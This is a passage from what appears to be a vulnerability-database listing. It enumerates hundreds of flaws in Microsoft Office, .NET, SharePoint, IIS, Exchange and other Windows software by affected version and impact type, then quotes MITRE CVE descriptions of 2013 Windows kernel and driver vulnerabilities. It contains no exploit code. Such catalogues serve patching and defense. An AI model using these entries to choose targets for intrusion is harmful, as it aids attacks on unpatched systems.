SP2/3.5/3.5.1/4/4.5 on 64-bit Array privilege escalation [9393] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Permission privilege escalation [9392] Microsoft .NET Framework up to 4.5 Permission privilege escalation [9189] Microsoft Outlook S/MIME weak encryption [8747] Microsoft Malware Protection Engine 1.1.9402.0 File Scan memory corruption [8737] Microsoft Word 2003 SP3 Shape Data Parser privilege escalation [8725] Microsoft Lync 2010/2013 memory corruption [8724] Microsoft .NET Framework 4.5 WCF Authentication Endpoint Setup weak authentication [8723] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 XML File privilege escalation [8206] Microsoft SharePoint Server 2010 SP1 HTML Sanitization Component cross site scripting [8200] Microsoft SharePoint Server 2013 ACL privilege escalation [8172] Microsoft Skype up to 6.2.0.106 unknown vulnerability [7981] FFmpeg up to 1.1.3 Microsoft RLE Data msrledec.c msrle_decode_8_16_24_32 memory corruption [7971] Microsoft Office for Mac 2011 up to 14.3.1 on Mac HTML5 Mail Message Parser information disclosure [7968] Microsoft SharePoint Server 2010 SP1 Input Validator memory corruption [7967] Microsoft SharePoint Server 2010 SP1 User Account directory traversal [7966] Microsoft SharePoint Server 2010 SP1 cross site scripting [7965] Microsoft SharePoint Server 2010 SP1 User Account Callback privilege escalation [7642] Microsoft Exchange 2007/2010 Outlook Web Access vspdx.dll) memory corruption [7343] Microsoft Lync 2012 HTTP Format String [7259] Microsoft .NET Framework 3.5/3.5 SP1/3.5.1/4 Replace privilege escalation [7256] Microsoft .NET Framework up to 4.5 XBAP privilege escalation [7255] Microsoft .NET Framework up to 4.5 System.DirectoryServices.Protocolsb Method memory corruption [7254] Microsoft .NET Framework up to 4.5 XAML Browser Application memory corruption [7253] Microsoft .NET Framework up to 4.5 Code Access Security information disclosure [7230] Microsoft Excel 2010 SP1 on 32-bit XLS File denial of service [7209] NetIQ eDirectory up to 8.8.7.1 on Windows HTTP Request denial of service [7121] Microsoft Exchange 2007/2010 RSS Feed privilege escalation [7056] FreeSSHD 1.2.1/1.2.2/1.2.6 on Windows Authentication freeSSHd.exe weak authentication [6969] Adobe ColdFusion 10.0 on Windows denial of service [6935] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6934] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6933] Microsoft Office Excel 2003/2007/2010 SerAuxErrBar memory corruption [6930] Microsoft .NET Framework 4.0/4.5 Reflection Optimization Object Permission privilege escalation [6929] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Web Proxy Setting Auto-Discovery privilege escalation [6928] Microsoft .NET Framework up to 4 Path Subversion Libraries privilege escalation [6927] Microsoft .NET Framework 2.0 SP2/3.5.1 Trusted Code Function information disclosure [6926] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 Object Permission Handller privilege escalation [6925] Microsoft IIS 7.0/7.5 FTP Command information disclosure [6924] Microsoft IIS 7.5 Log File Permission information disclosure [6918] Microsoft Excel 2007 SP2 Input Sanitizer memory corruption [6831] Microsoft Office Picture Manager 2010 File memory corruption [6830] Microsoft Word 2007/2010 File memory corruption [6819] Microsoft Excel 2007 File memory corruption [6626] Microsoft SharePoint/Lync/Infopath 2007/2010 HTML Sanitization cross site scripting [6624] Microsoft SQL Server up to 2012 Report Manager cross site scripting [6622] Microsoft Word -/2003/2007/2010 RTF Document denial of service [6621] Microsoft Word 2007 PAPX privilege escalation [6563] Novell GroupWise 2012/8.0/8.00/8.01/8.02 Client for Windows memory corruption [5945] Microsoft Office 2007/2010 memory corruption [5933] Microsoft SQL Server 2000/2005/2008/2008 R2 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5932] Microsoft Office 2003/2007/2010 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5906] Citrix Access Gateway Plugin up to 9.3.49.5 on Windows nsepa.exe StartEPA memory corruption [5649] Microsoft Office 2003/2007/2010 libraries privilege escalation [5645] Microsoft SharePoint 2007/2010/3.0 Reflected cross site scripting [5644] Microsoft SharePoint 2010 scriptesx.ashx cross site scripting [5643] Microsoft SharePoint 2007/2010 privilege escalation [5642] Microsoft SharePoint 2007 privilege escalation [5641] Microsoft SharePoint 2010 cross site scripting [5636] Microsoft Outlook Web App up to 14.1.287.0 owa/redir.aspx weak authentication [5623] Microsoft IIS up to 7.5 File Name Tilde privilege escalation [5518] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 privilege escalation [5474] Microsoft WordPad 5.1 DOC Document denial of service [5445] Symantec Endpoint Protection up to 11.0 RU7 MP1 on Windows Server 2003 Network Threat Protection Module denial of service [5368] Microsoft .NET Framework up to 4 privilege escalation [5367] Microsoft .NET Framework up to 4 privilege escalation [5362] Microsoft Office 2003/2007 GDI+ privilege escalation [5360] Microsoft .NET Framework 4 memory corruption [5291] Microsoft Visual Studio 2008 Incremental Linker link.exe ConvertRgImgSymToRgImgSymEx Integer Coercion Error [5268] Microsoft Office 2008 on Mac RTF Pfragment File memory corruption [5080] Microsoft SQL Server 2005/2008/2008R2 CREATE DATABASE sql injection [5050] Microsoft Office 2007 WPS Converter memory corruption [5049] Microsoft SQL Server 2000/2005/2008 MSCOMCTL.OCX privilege escalation [5048] Microsoft Office 2003/2007/2010 MSCOMCTL.OCX privilege escalation [5047] Microsoft .NET Framework up to 4.5 Parameter Validator privilege escalation [5022] Novell GroupWise 2.1.0 on Windows/Linux/NetWare Messenger nmma.exe login memory corruption [5021] Novell GroupWise 2.1.0 on Windows/Linux/NetWare Messenger nmma.exe createsearch memory corruption [4941] Microsoft Security Essentials Antimalware Engine CAB File Parser privilege escalation [4919] Microsoft Security Essentials Antimalware Engine TAR File Parser privilege escalation [4642] Microsoft .NET Framework 2.0 SP2/3.5.1/4 XAML Browser Application privilege escalation [4640] Microsoft SharePoint 2010 inplview.aspx cross site scripting [4636] Microsoft SharePoint 2010 wizardlist.aspx cross site scripting [4635] Microsoft SharePoint 2010 themeweb.aspx cross site scripting [4509] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 Forms Authentication Ticket Caching privilege escalation [4508] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 Username Parser privilege escalation [4507] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 Forms Authentication privilege escalation [4506] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 ASP.NET Hash denial of service [4482] Microsoft Word 2007/2010/2011 Document Parser denial of service [4480] Microsoft Excel 2003 privilege escalation [4477] Microsoft PowerPoint 2007 SP2/2008 OfficeArt privilege escalation [4473] Microsoft PowerPoint 2007 SP2/2010 DLL-Loader privilege escalation [4471] Microsoft Office 2003/2007 Publisher privilege escalation [4470] Microsoft Office 2003 SP3 privilege escalation [4469] Microsoft Office Publisher privilege escalation [4453] Microsoft Excel 2003 Record Parser privilege escalation [4446] Microsoft Office 2007/2008 OfficeArt Record Parser privilege escalation [4445] Microsoft Office 2007/2010/2011 Word Document Parser denial of service [4414] Microsoft SharePoint 2010 cross site scripting [4413] Microsoft SharePoint 2010/2007/3.0 XML/XLS information disclosure [4412] Microsoft Office 2003/2007 Library Loader privilege escalation [4411] Microsoft Excel 2003 denial of service [4397] Microsoft .NET Framework 3.5 SP1/4.x Chart Control information disclosure [4391] Microsoft .NET Framework 2.0 SP2/3.5.1/4 Socket Restriction information disclosure [4370] Microsoft .NET Framework up to SP2 Array privilege escalation [4369] Microsoft Excel 2002/2003/2007 privilege escalation [4349] Microsoft Office 2004/2007/2008 Presentation File Parser privilege escalation [4348] Microsoft PowerPoint 2002/2003/2007 privilege escalation [4334] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 JIT Compiler privilege escalation [4332] Microsoft PowerPoint 2007/2010 privilege escalation [4289] Microsoft Excel 2007 Shape Data Parser denial of service [4286] Microsoft PowerPoint 2002 SP3/2003 SP3/2004/2007 SP2/2008 OfficeArt Container Parser privilege escalation [4246] Oracle Database Server 11.1.0.7/11.2.0.1 on Windows Cluster Verify Utility unknown vulnerability [4234] Microsoft IIS 7.5 FTP Server memory corruption [4230] Microsoft Exchange 2007 on 64-bit RPC store.exe denial of service [4229] Microsoft SharePoint 2007 Document Conversion Launcher Service unknown vulnerability [4200] Microsoft .NET Framework 4.0 on 64-bit JIT Compiler privilege escalation [4197] Microsoft SharePoint 2007/3.0 cross site scripting [4196] Microsoft Word 2002/2003/2007/2010 memory corruption [4186] Microsoft Outlook 2002/2003/2007 Content Parser memory corruption [4180] Microsoft IIS 5.1/6.0/7.0/7.5 memory corruption [4179] Microsoft IIS 7.5 FastCGI memory corruption [4159] Microsoft Excel 2002/2003 SXDB PivotTable privilege escalation [4146] Microsoft Outlook 2002/2003/2007 SMB Attachment PR_ATTACH_METHOD privilege escalation [4145] Microsoft Access 2003/2007 ActiveX ACCWIZ.dll privilege escalation [4133] Microsoft Office 2003/2007/Xp COM Object Instantiator privilege escalation [4125] Microsoft SharePoint 2007/3.0 help.aspx cross site scripting [4090] Microsoft Excel 2002/2003/2007 privilege escalation [4082] Microsoft PowerPoint 2002 SP3 memory corruption [4074] Microsoft IIS 5.0/5.06/5.1/6.0 ASP privilege escalation [4069] Microsoft Project 2003/2007 Project Memory Validator denial of service [4057] Microsoft Excel memory corruption [4056] Microsoft Word 2002/2003 File Information Block Parser memory corruption [4024] Microsoft IIS 5.0/6.0/7.0 FTP Server denial of service [4000] Microsoft Office 2003/Sp3/Xp Web Components privilege escalation [3999] Microsoft Office 2007 Pointer privilege escalation [3974] Microsoft PowerPoint 2000/2002/2003 Sound Data memory corruption [3973] Microsoft PowerPoint 2000/2002/2003 Notes Container memory corruption [3972] Microsoft PowerPoint 2000/2002/2003 BuildList memory corruption [3971] Microsoft PowerPoint 2000/2002/2003 Object memory corruption [3970] Microsoft PowerPoint 2000/2002/2003 Paragraph memory corruption [3969] Microsoft PowerPoint 2000/2002/2003 Atom memory corruption [3952] Microsoft ISA Server 2004/2006 denial of service [3946] Microsoft PowerPoint 2000/2002/2003/2004 privilege escalation [3932] Microsoft Excel 2000/2002/2003/2004/2007 Object Reference privilege escalation [3896] Microsoft SQL Server up to 2005 sp_replwritetovarbin memory corruption [3892] Microsoft Excel 2000/2002/2003 Formula denial of service [3891] Microsoft Excel 2000/2002/2003 denial of service [3890] Microsoft Excel 2000/2002/2003 NAME Index denial of service [3889] Microsoft Word 2000/2002/2003/2007 Table Property memory corruption [3888] Microsoft Word 2000/2002/2003/2007 RTF Stylesheet denial of service [3887] Microsoft Word 2000/2002/2003/2007 denial of service [3886] Microsoft Word 2000/2002/2003/2007 ControlWord memory corruption [3885] Microsoft Word 2000/2002/2003/2007 denial of service [3884] Microsoft Word 2000/2002/2003/2007 denial of service [3883] Microsoft Word 2000/2002/2003/2007 RTF memory corruption [3882] Microsoft Word 2000/2002/2003/2007 LFO privilege escalation [3844] Microsoft Excel 2003 REPT Numeric Error [3843] Microsoft Excel up to 2007 BIFF File denial of service [3842] Microsoft Excel 2003 VBA Performance Cache denial of service [3841] Microsoft Office Xp CDO URI cross site scripting [3799] Microsoft Visual Studio 6 Masked Edit Control memory corruption [3796] Microsoft Office 2000 WPG privilege escalation [3795] Microsoft Office 2000/2003/Xp BMP Image BMPIMP32.FLT denial of service [3794] Microsoft Office 2000/2003/Xp PICT bits_per_pixel denial of service [3793] Microsoft Office 2000/2003/Xp PICT denial of service [3792] Microsoft Office 2000 EPS File privilege escalation [3783] Microsoft Word 2002 denial of service [3782] Microsoft SQL Server Statement Numeric Error [3781] Microsoft SQL Server Database Backup File memory corruption [3780] Microsoft SQL Server Query Type Conversion memory corruption [3779] Microsoft SQL Server Memory Page Reuse information disclosure [3778] Microsoft Exchange 2003/2007 Outlook Web Access cross site scripting [3701] Microsoft Word 2003 CSS privilege escalation [3700] Microsoft Word 2003 RTF Document privilege escalation [3649] Microsoft Office up to XP privilege escalation [3648] Microsoft Excel 2003 privilege escalation [3647] Microsoft Outlook up to 2007 mailto URI privilege escalation [3552] Microsoft Excel 2000/2002/2003 File memory corruption [3491] Microsoft Web Proxy Auto-Discovery Feature unknown vulnerability [3373] Microsoft Word 2000/2002 privilege escalation [3309] Microsoft Visual Studio 6 ActiveX Control VBTOVSI.dll directory traversal [3308] Microsoft Visual Studio 6 ActiveX Control PDWizard.ocx directory traversal [3241] Microsoft Excel 2000/2003/2004/XP SP3 rtWnDesk memory corruption [3176] Microsoft Excel 2000/2002/2003/2007 File Attribute memory corruption [3175] Microsoft Excel 2000/2002/2003/2007 Active Worksheet memory corruption [3174] Microsoft Excel 2000/2002/2003/2007 Version Information memory corruption [3172] Microsoft Office Publisher 2007 Pointer denial of service [3067] Microsoft Office 2000/2003/2004/2007/Xp Drawing Object denial of service [3065] Microsoft Excel 2000/2002/2003/2007 Filter memory corruption [3064] Microsoft Excel 2000/2002/2003/2004/2007 set Font memory corruption [3063] Microsoft Excel 2000/2002/2003/2007 BIFF Record memory corruption [3053] Microsoft Excel Viewer 3.x OCX ActiveX Control memory corruption [3050] Microsoft Word Viewer 3.x OCX ActiveX Control memory corruption [3049] Microsoft PowerPoint Viewer 3.x OCX ActiveX Control memory corruption [3048] Microsoft Excel Viewer 3.x OCX ActiveX Control memory corruption [2939] Microsoft Word 2000 memory corruption [2894] Microsoft Office 2000/2003/2004/Xp Undefined String Format String [2884] Microsoft Word 2000/2002/2003 memory corruption [2810] Microsoft Outlook 2000/2002/2003 Office Saved Search memory corruption [2809] Microsoft Outlook 2000/2002/2003 Header denial of service [2808] Microsoft Outlook 2000/2002/2003 Meeting denial of service [2807] Microsoft Excel 2000/2002/2003 XLS File privilege escalation [2765] Microsoft Project Server 2003 pdsrequest.asp weak authentication [2718] Microsoft Word 2000/2002/2003 DOC Document memory corruption [2695] Alt-N MDaemon 9.0.5/9.0.6/9.51/9.53 on Windows privilege escalation [2610] Microsoft PowerPoint 2003 PPT Document denial of service [2597] Microsoft Office 2003/Xp Smart-Tag Parser memory corruption [2596] Microsoft Office 2000/2003/2004/Xp Value Read privilege escalation [2595] Microsoft Office 2000/2001/2003/2004 Diagram Value privilege escalation [2594] Microsoft Office 2000/2001/2003/2004 Document memory corruption [2571] Microsoft PowerPoint up to 2003 Document privilege escalation [2554] Microsoft PowerPoint 2000 memory corruption [2508] Microsoft Word 2000 memory corruption [2452] Apache HTTP Server up to 2.2.3 on Windows mod_alias unknown vulnerability [2437] Microsoft Office up to XP Filename memory corruption [2383] Citrix MetaFrame 1.8/3.0 on Windows Registry Permission privilege escalation [2382] Microsoft PowerPoint up to 2003 Presentation Open/Close memory corruption [2378] Microsoft PowerPoint 2000/2002/2003 Document Parser memory corruption [2367] Microsoft Office 2000/2003/XP Document String privilege escalation [2365] Microsoft Office 2000/2003/XP PNG Image memory corruption [2364] Microsoft Office 2000/2003/XP GIF Image memory corruption [2357] Microsoft Excel up to 2003 on Asian System Document Repair Style memory corruption [2349] Novell GroupWise up to 7.0 on Windows API Email unknown vulnerability [2325] Microsoft Excel up to 2003 Hyperlink hlink.dll memory corruption [2324] Microsoft Excel 2000/2002/2003/2004 XLS File memory corruption [2312] Microsoft Exchange 2000 Outlook Web Access cross site scripting [2308] Microsoft PowerPoint 2000/2002/2003/2004 PPT Document memory corruption [2294] Microsoft Word up to 2003 DOC Document privilege escalation [2263] Cisco VPN Client up to 4.8.01.0300 on Windows privilege escalation [2253] Microsoft Word up to 2003 privilege escalation [2217] Microsoft Exchange 2000/2003 Calender Collaboration Data Object memory corruption [2190] Microsoft Office 2003 mailto URI unknown vulnerability [2084] Microsoft Excel 95/97/2000/2002/2003 File memory corruption [2083] Microsoft Office up to XP Routing Slip memory corruption [2075] Microsoft Visual Studio 6 dbp File memory corruption [2053] Microsoft Office/Visio/Project 2003 Korean Input Method Editor privilege escalation [2052] Microsoft PowerPoint 2000 HTML Rendering information disclosure [1975] PostgreSQL up to 8.1.1 on Windows Multiple Connection denial of service [1971] Microsoft Visual Studio 2005 Form Loader load memory corruption [1964] Microsoft Exchange 5/5.5/2000 Email memory corruption [1963] Microsoft Outlook 2000/2002/2003 TNEF MIME Attachment Integer Coercion Error [1947] PHP 4.3.10/4.4.0/4.4.1/4.4.2 on Windows mysql_connect memory corruption [1928] Microsoft IIS 5.1 Virtual Directory privilege escalation [1790] Microsoft Exchange 2000 SMTP Collaboration Data Object memory corruption [1737] Microsoft Exchange 2003 IMAP4 Service Store.exe denial of service [1704] Microsoft IIS 5.1/6 privilege escalation [1699] Veritas Backup Exec up to 8.6 on Windows unknown vulnerability [1697] Novell eDirectory 8.7.3 on Windows iMonitor memory corruption [1669] Microsoft Word 2000 Shared Sections denial of service [1668] Microsoft PowerPoint 2000 Shared Sections denial of service [1667] Microsoft Outlook 2000 Shared Sections denial of service [1666] Microsoft Office 2000 Shared Sections denial of service [1665] Microsoft Excel 2000 Shared Sections denial of service [1664] Microsoft Access 2000 Shared Sections denial of service [1644] Sun MySQL up to 4.1.9 on Windows denial of service [1597] Microsoft Word 2000/2002 Font Parser memory corruption [1571] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [1351] Microsoft Exchange 2000/2003 SMTP Service memory corruption [1348] Microsoft MSN Messenger up to 7.0beta GIF Image memory corruption [1273] Sun MySQL up to 4.1.9 on Windows MS DOS Device Name denial of service [1269] Microsoft Exchange 2003 Sub-Directories Store.exe denial of service [1210] IBM DB2 up to 8.1 FP8 on Windows unknown vulnerability [1192] Microsoft Office 2000/2002/XP URL memory corruption [1188] Microsoft Exchange 2003 Outlook Web Access owalogon.asp information disclosure [1154] Microsoft Office RC4 IV unknown vulnerability [981] Microsoft Proxy Server/ISA Server up to 2000 DNS Revese Lookup Cache weak authentication [961] Microsoft ISA Server HTTP Keep-Alive weak authentication [881] Microsoft Excel 2000/2001/2002 memory corruption [877] Microsoft Word 2002 DOC Document denial of service [865] IBM DB2 Universal Database 7.x/8.x on Windows memory corruption [857] Microsoft SQL Server up to 7.0 SP4 memory corruption [832] Microsoft WordPerfect memory corruption [783] Microsoft Exchange 5.5 Outlook Web Access HTML Redirection cross site scripting [762] Microsoft IIS 4.0 Redirect memory corruption [751] Microsoft Word Email privilege escalation [705] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [704] Microsoft ISA Server 2000 SP2 Web Proxy privilege escalation [703] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [702] Microsoft ISA Server 2000 SP2 External HTTP Traffic weak encryption [701] Microsoft ISA Server 2000 SP2 ICMP unknown vulnerability [700] Trend Micro OfficeScan up to Corporate 5.58 Windows Help unknown vulnerability [694] PHP up to 4.3.6 on Windows escapeshellcmd/escapeshellarg privilege escalation [663] Microsoft Outlook 2003 RTF Document OLE Object containing privilege escalation [652] Microsoft Outlook 2003 HTML Mail Reply privilege escalation [649] Microsoft IIS information disclosure [574] Trend Micro VirusWall up to 3.52 Build1466 on Windows /ishttpd/localweb/java/ directory traversal [553] Microsoft Messenger 6.0/6.1 File Request information disclosure [551] Microsoft Outlook 2002/XP mailto cross site scripting [479] Microsoft Exchange 2003 Outlook Web Access information disclosure [477] Microsoft ISA Server 2000 H.323 Filter memory corruption [476] Microsoft ISA Server 2000 H.323/H.225.0/Q.931 memory corruption [467] Microsoft IIS up to 6.0 privilege escalation [459] Microsoft IIS 5.0 Configuration [419] Microsoft Exchange 2003 Outlook Web Access information disclosure [407] Microsoft Messenger up to 6.0 MSG Message unknown vulnerability [385] Microsoft Excel up to 2002 Macro Security memory corruption [384] Microsoft Word 97/98/2000/2002 Macro Name memory corruption [334] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [333] Microsoft Exchange 5.5/2000 SMTP Service memory corruption [307] IBM DB2 Universal Database 7.x on Windows INVOKE memory corruption [263] Microsoft Word 97/98/2000/2002 Macro privilege escalation [262] Microsoft Office 97/2000/XP HTML memory corruption [244] Sun MySQL 3/4 on Windows my.ini weak encryption [233] Microsoft IIS 4.0/5.0/5.1 /.asp unknown vulnerability [199] Microsoft MSDE/SQL Server 2000 LPC memory corruption [198] Microsoft SQL Server 7/2000 Named Pipe privilege escalation [197] Microsoft MSDE/SQL Server 7/2000 Named Pipe Session privilege escalation [190] Microsoft IIS 6.0 Admin Interface weak authentication [189] Microsoft IIS 6.0 Admin Interface weak authentication [187] Microsoft IIS 6.0 Admin Interface cross site scripting [183] Microsoft Messenger 6.0 Build 6.0.0501 Image Transfer memory corruption [177] Microsoft ISA Proxy 2000 Error Site cross site scripting [173] Microsoft SQL Server 7/2000 Index.PHP memory corruption [159] Microsoft SQL Server on Win NT/2000/XP Named Pipe xp_fileexist unknown vulnerability [157] Microsoft Exchange 5.5/2000 HTML Attachment cross site scripting [86] Microsoft IIS 5.0/5.1 WebDAV denial of service [85] Microsoft IIS 4.0/5.0 ASP Response.AddHeader memory corruption [84] Microsoft IIS 5.0 Server Side Includes SSINC.DLL memory corruption [83] Microsoft IIS 4.0/5.0/5.1 Error Message cross site scripting [82] Microsoft IIS 4.0/5.0 nsiislog.dll denial of service [62] Microsoft .NET Framework Passport unknown vulnerability [43] Microsoft Outlook Express MHTML memory corruption [15] Microsoft IIS 5.0 WebDav memory corruption [12] Microsoft Outlook 2000/Express 6 window.PopUp privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3127] The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows Media Format Runtime 9 and 9.5, and wmvdecod.dll in Windows Media Format Runtime 11 and Windows Media Player 11 and 12 allows remote attackers to execute arbitrary code via a crafted media file, aka "WMV Video Decoder Remote Code Execution Vulnerability." [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1337] Microsoft .NET Framework 4.5 does not properly create policy requirements for custom Windows Communication Foundation (WCF) endpoint authentication in certain situations involving passwords over HTTPS, which allows remote attackers to bypass authentication by sending queries to an endpoint, aka "Authentication Bypass Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1333] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1313] Object Linking and Embedding (OLE) Automation in Microsoft Windows XP SP3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted RTF document, aka "OLE Automation Remote Code Execution Vulnerability." [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1299] Microsoft Windows Modern Mail allows remote attackers to spoof link targets via a crafted HTML e-mail message. [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer 